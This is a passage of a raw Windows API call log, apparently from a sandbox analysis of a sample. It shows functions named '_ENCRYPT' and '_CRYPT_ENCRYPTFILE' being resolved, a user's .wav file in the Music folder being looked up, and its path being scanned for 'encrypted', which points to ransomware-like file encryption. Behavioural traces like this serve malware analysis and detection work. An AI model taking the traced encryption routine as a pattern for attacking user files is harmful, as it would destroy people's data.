dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.424] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.425] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.425] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.425] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.425] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.425] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.426] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.426] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.426] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.426] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.426] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.427] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.427] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.427] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.427] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0xb4f60e50, ftLastWriteTime.dwHighDateTime=0x1d5bae1, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 0x7c20c0 [0038.427] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.428] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0xb4f60e50, ftLastWriteTime.dwHighDateTime=0x1d5bae1, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 0x7c20c0 [0038.428] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SG2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JCe2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ce2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OU9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ef2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QQFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QFr-.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.430] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.430] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.430] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.430] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.430] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.430] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.430] PeekMessageW (in: 